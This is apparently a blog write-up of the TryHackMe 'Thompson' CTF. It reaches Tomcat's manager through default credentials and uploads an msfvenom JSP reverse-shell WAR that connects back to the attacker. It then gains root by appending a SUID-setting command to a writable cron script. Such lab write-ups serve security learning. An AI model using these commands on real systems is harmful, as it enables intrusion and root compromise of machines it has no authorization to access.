Thompson Write-Up

Description

Thompson is a boot2root CTF on TryHackMe. It has “Easy” difficulty. Initial access has been done through uploading a reverse shell. Privilege escalation to root could be done through a misconfigured cronjob.

Enumeration

After running a Nmap scan we can see that port 22, 8009 and 8080 is running. On port 8080 Tomcat 8.5.5 is running.

nmap -sC -sV -O -oN nmap/scripts 10.10.39.116

The landing page of the Tomcat server shows us the default Tomcat page.

We can log into the Management portal via default credentials.

Now we have enough privileges to upload a reverse shell.

Initial access

The reverse shell was created with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your tun0 IP> LPORT=4444 -f war > shell.war

Now we can upload the reverse shell through the web portal.

The reverse shell should be uploaded.

Before navigating to /shell we have to start a listener. For this purpose I will use pwncat.

pc -lp 4444

Next we can navigate to “http://10.10.39.116:8080/shell/” and get a shell on the box as the tomcat user.

We can now navigate to /home/jack and get the user flag.

Privilege Escalation

Inside Jack’s home folder there are two interesting files. The first one is “id.sh”. It is a bash script that runs the id command and writes the outputs into “test.txt”. Reading “test.txt” shows us that this script was run by root.

Based on these information we can assume that a cronjob is running. To validate our assumption we can read the /etc/crontab file. And indeed the “id.sh” command is run as root inside a cronjob.

We also have write privileges for the file “id.sh”. This means we can now inject our code into the “id.sh” file and get a root shell. I will add the SUID bit to /bin/bash.

echo ‘chmod +s /bin/bash’ >> id.sh

After waiting for a minute, bash should have theSUID bit set.

Finally we can spawn a root shell and read the root flag.

/bin/bash -p

Mitigation

Default passwords should be changed as soon as possible. Furthermore the Tomcat version is a very old one. So it should be updated if possible. Also scripts that are run by a cronjob, should only be writable by the user that is running the cronjob.

--

--

--

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How does Ionic Mobile app Development prove to be Cost-efficient?

Easiest and fast way to update an Oracle table using the data in another table

codebar Helsinki: first year recap

Inside 123ContactForm! Meet the teams- Interview with some of our devs

A Follow Along to How I Created My Paleo Recipe CLI Project!

Going Live with a Pre-recorded video

Clue’s Erasmus Exchange

Connecting Robo 3T with DocumentDB outside AWS VPC.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rabbit

Rabbit

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

More from Medium

TryHackme: PalsForLife

Library Writeup

Agent Sudo — TryHackMe Walkthrough

Throwback — Part 2 — Mail Server